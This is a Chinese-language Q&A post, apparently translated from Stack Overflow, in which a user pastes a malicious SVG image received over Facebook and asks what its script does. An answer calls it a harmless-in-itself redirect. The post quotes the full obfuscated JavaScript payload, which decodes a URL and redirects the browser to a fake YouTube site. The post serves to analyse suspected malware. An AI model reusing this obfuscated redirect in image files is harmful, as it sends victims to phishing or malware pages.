我收到一条facebook消息,里面有两个文件(SVG图片),我点击了其中的一个(我不知道为什么:( )。然后,带着红点的新标签打开了,然后我立即被重定向到一些假装看起来像Youtube (http://kerman.pw/?fb_dsa
)的网站。
然后,我使用“链接另存为...”下载了.svg文件。函数。它似乎是嵌入到svg中的一些javascript代码,所以我将其发布在这里(我对JS不是很了解):
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
<circle cx="250" cy="250" r="50" fill="red" />
<script type="text/javascript"><![CDATA[
function xcxxy(gyqbv,hzrgh,ktjrf){
var qixua = "XY_/3cU.ioGJkP2hgveS1Tj75ABb=Nrs:u?fKmdI0nLty84CRpVOzaFD9lZExMH6";
var vyqsvo = ["rYf=3vXU:zitl17N.k24ah8ZO6KoDFjPMEceRmsTGbdVBH59uJS\/I0g_CL?pxAyn","RN?dh38MCU0o6u=tIXPp.nZJzc5D:TiLFOvYfjG4E2K1A_rgaHykbS\/9lB7sexVm","n4mAObK9zBt_YZrcE1JHM.SF=dRT:6aDeUuIPi2vfhkGXp?y5LgVoCj0873lxN\/s","C981S?moMiHktu:nev0ZBzVh.2FONIcbxf7GYL6RgpUTAP4j_DJl\/dKa35rsX=Ey","9n?SGiTY6z8BjCbM:Lpsr0xZeUvPaH.JmfudtlE1\/y=kFODRKN24c5oX37_hAIVg",":z2oNO?Tr=aIx8.6gVeRn4_vYE5f1mZAXKltbuU7ByDSMis0Fk\/Pjch3CGLHJd9p"];
var bnkdip = "";
var igrqm = 0;
while(vyqsvo[igrqm]){
igrqm++;
}
var kwwtmh = 0;
while(gyqbv[kwwtmh]){
var jikaig = 0;
var axfnq = -1;
while(qixua[jikaig]){
if(qixua[jikaig] == gyqbv[kwwtmh]){
axfnq = jikaig;
break;
}
jikaig++;
}
if(axfnq >= 0){
var abxnk = 0;
var wjtfca = -1;
while(vyqsvo[kwwtmh%igrqm][abxnk]){
if(vyqsvo[kwwtmh%igrqm][abxnk] == gyqbv[kwwtmh]){
wjtfca = abxnk;
break;
}
abxnk++;
}
bnkdip += qixua[wjtfca];
}else{
bnkdip += gyqbv[kwwtmh];
}
kwwtmh++;
}
var evhrt = "";
for(izqfrv=hzrgh;izqfrv<bnkdip.length;izqfrv++){
evhrt += bnkdip[izqfrv];
}
bnkdip = evhrt;
return bnkdip;
}
var obejok = window;
var iyysri = xcxxy("sUTA:Gkb106SzH",11,false);
var leizjp = xcxxy("kBB?5S:Uh",1,false);
var nvanw = xcxxy(".Pi/MksB2n7jIta0d",13,false);
obejok[iyysri][leizjp][nvanw] = xcxxy("siqnkSJFA1l=Eiz6YOzjADMk=1afJSUHcD",3,false);
]]></script>
</svg>
我不太了解javascript,我想问一下它能做什么。它会伤害我吗?非常感谢
发布于 2016-11-21 07:19:09
SVG文件中嵌入了javascript,这一点是正确的。SVG是矢量图形文件,它将根据文件中的指令在浏览器中绘制图像。您找到的SVG包含模糊的javascript,用于隐藏实际发生的事情。
从我所看到的来看,它是一个打开新浏览器窗口并加载新URL的脚本,因此,它本身并不危险,这完全取决于它将您重定向到哪个网站,以及当您到达该网站时将启动哪些脚本。
因此,简而言之,假设您被重定向到的站点是恶意的,那么它可能会损害您的计算机。
我希望这能有所帮助。
https://stackoverflow.com/questions/40710399
复制相似问题